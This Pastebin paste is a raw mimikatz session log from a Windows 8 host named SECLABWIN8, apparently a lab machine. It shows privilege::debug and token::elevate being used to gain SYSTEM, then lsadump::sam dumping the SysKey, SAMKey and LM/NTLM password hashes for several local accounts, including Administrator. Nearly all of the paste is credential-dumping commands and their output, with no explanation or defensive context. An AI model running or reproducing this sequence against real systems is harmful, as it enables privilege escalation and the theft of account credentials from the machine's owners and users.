API tools faq
paste
Advertisement
Guest User

hi chris

a guest
Oct 18th, 2019
362
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.24 KB | None | 0 0
raw download clone embed print report
  1. Using 'hash.txt' for logfile : OK
  2.  
  3. mimikatz # lsadump::sam
  4. Domain : SECLABWIN8
  5. SysKey : 3938d539c83d8e6a3488325151ad0c05
  6. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  7. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  8.  
  9. mimikatz # lsadump::sam
  10. Domain : SECLABWIN8
  11. SysKey : 3938d539c83d8e6a3488325151ad0c05
  12. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  13. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  14.  
  15. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  16. Domain : SECLABWIN8
  17. SysKey : 3938d539c83d8e6a3488325151ad0c05
  18. ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
  19. ERROR kuhl_m_lsadump_getUsersAndSamKey ; kull_m_registry_RegOpenKeyEx SAM Accounts (0x00000005)
  20.  
  21. mimikatz # token::elevate
  22. Token Id : 0
  23. User name :
  24. SID name : NT AUTHORITY\SYSTEM
  25.  
  26. 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
  27. -> Impersonated !
  28. * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
  29. * Thread Token : {0;000003e7} 0 D 34417986 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
  30.  
  31. mimikatz # lsadump::sam SystemBkup.hiv SamBkup.hiv
  32. Domain : SECLABWIN8
  33. SysKey : 3938d539c83d8e6a3488325151ad0c05
  34. Local SID : S-1-5-21-3030430307-1650540796-4004713979
  35.  
  36. SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
  37.  
  38. RID : 000001f4 (500)
  39. User : Administrator
  40. Hash LM : a14dc20682ebc0a35db15e7df7536625
  41. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  42. lm - 0: a14dc20682ebc0a35db15e7df7536625
  43. ntlm- 0: 4fd9671fef737b514356e75063f7dcac
  44. ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
  45.  
  46. RID : 000001f5 (501)
  47. User : Guest
  48.  
  49. RID : 000003e9 (1001)
  50. User : win8
  51. Hash NTLM: 00277317be7631466e6480877eedba5c
  52.  
  53. RID : 000003ea (1002)
  54. User : poweruser
  55. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  56.  
  57. RID : 000003eb (1003)
  58. User : snmp
  59. Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
  60.  
  61. mimikatz # reg save HKLM\SAM SamBkup.hiv
  62. ERROR mimikatz_doLocal ; "reg" command of "standard" module not found !
  63.  
  64. Module : standard
  65. Full name : Standard module
  66. Description : Basic commands (does not require module name)
  67.  
  68. exit - Quit mimikatz
  69. cls - Clear screen (doesn't work with redirections, like PsExec)
  70. answer - Answer to the Ultimate Question of Life, the Universe, and Everything
  71. coffee - Please, make me a coffee!
  72. sleep - Sleep an amount of milliseconds
  73. log - Log mimikatz input/output to file
  74. base64 - Switch file input/output base64
  75. version - Display some version informations
  76. cd - Change or display current directory
  77. localtime - Displays system local date and time (OJ command)
  78. hostname - Displays system local hostname
  79.  
  80. mimikatz # privilege::debug
  81. Privilege '20' OK
  82.  
  83. mimikatz # token::elevate
  84. Token Id : 0
  85. User name :
  86. SID name : NT AUTHORITY\SYSTEM
  87.  
  88. 464 {0;000003e7} 0 D 41960 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Primary
  89. -> Impersonated !
  90. * Process Token : {0;0012310c} 2 D 34369037 SecLabWin8\Administrator S-1-5-21-3030430307-1650540796-4004713979-500 (14g,23p) Primary
  91. * Thread Token : {0;000003e7} 0 D 34449475 NT AUTHORITY\SYSTEM S-1-5-18 (04g,20p) Impersonation (Delegation)
  92.  
  93. mimikatz # log hash.txt
  94. Using 'hash.txt' for logfile : OK
  95.  
  96. mimikatz # lsadump::sam
  97. Domain : SECLABWIN8
  98. SysKey : 3938d539c83d8e6a3488325151ad0c05
  99. Local SID : S-1-5-21-3030430307-1650540796-4004713979
  100.  
  101. SAMKey : e0f17e1c0e355ca390e1e50b00b6d470
  102.  
  103. RID : 000001f4 (500)
  104. User : Administrator
  105. Hash LM : a14dc20682ebc0a35db15e7df7536625
  106. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  107. lm - 0: a14dc20682ebc0a35db15e7df7536625
  108. ntlm- 0: 4fd9671fef737b514356e75063f7dcac
  109. ntlm- 1: 31d6cfe0d16ae931b73c59d7e0c089c0
  110.  
  111. RID : 000001f5 (501)
  112. User : Guest
  113.  
  114. RID : 000003e9 (1001)
  115. User : win8
  116. Hash NTLM: 00277317be7631466e6480877eedba5c
  117.  
  118. RID : 000003ea (1002)
  119. User : poweruser
  120. Hash NTLM: 4fd9671fef737b514356e75063f7dcac
  121.  
  122. RID : 000003eb (1003)
  123. User : snmp
  124. Hash NTLM: f2477a144dff4f216ab81f2ac3e3207d
  125.  
  126. mimikatz #
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!